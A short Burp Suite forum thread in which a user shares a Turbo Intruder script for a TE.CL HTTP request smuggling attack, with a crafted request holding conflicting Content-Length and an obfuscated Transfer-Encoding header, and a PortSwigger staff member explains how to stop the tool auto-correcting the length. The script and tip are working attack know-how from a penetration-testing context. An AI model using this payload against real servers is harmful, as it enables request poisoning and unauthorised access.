Burp Suite User Forum

Turbo Intruder: always updating Content-Length header

Nan | Last updated: Mar 19, 2020 12:42AM UTC

Hello, I have been trying to launch a HTTP Desync attack using Turbo Intruder. Here is my script: def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, requestsPerConnection=1, timeout=10, pipeline=True, maxRetriesPerRequest=0, engine=Engine.THREADED, ) engine.start() attack = '''POST / HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding : chunked 46 POST /login HTTP/1.1 Host: example.com Content-Length: 15 kk 0 ''' engine.queue(attack) } ....... I am targeting an endpoint which I believe has the TE.CL vulnerability. For the above script (attack) to work, it's imperative that the 'Content-Length: 4' in the 'attack' request remains unchanged so that I can poison the vulnerable endpoint's receiving socket (with the request:'POST /login HTTP/1.1....'). However during my testing, I've noticed the 'Content-Length: 4' was always updated to 'Content-Length: 76' where 76 is the exact length of the message body of my 'attack' request, thus causing the failure of my Desync attack Any suggestions on how to avoid updating the 'Content-Length' header in this case? Did I not properly configure the Turbo Intruder?

Liam, PortSwigger Agent | Last updated: Mar 20, 2020 10:17AM UTC

You can change Content-Length to content-length. This bypasses Turbo Intruder’s auto-fixing of the value. Please let us know if you need any further assistance.

You need to Log in to post a reply. Or register here, for free.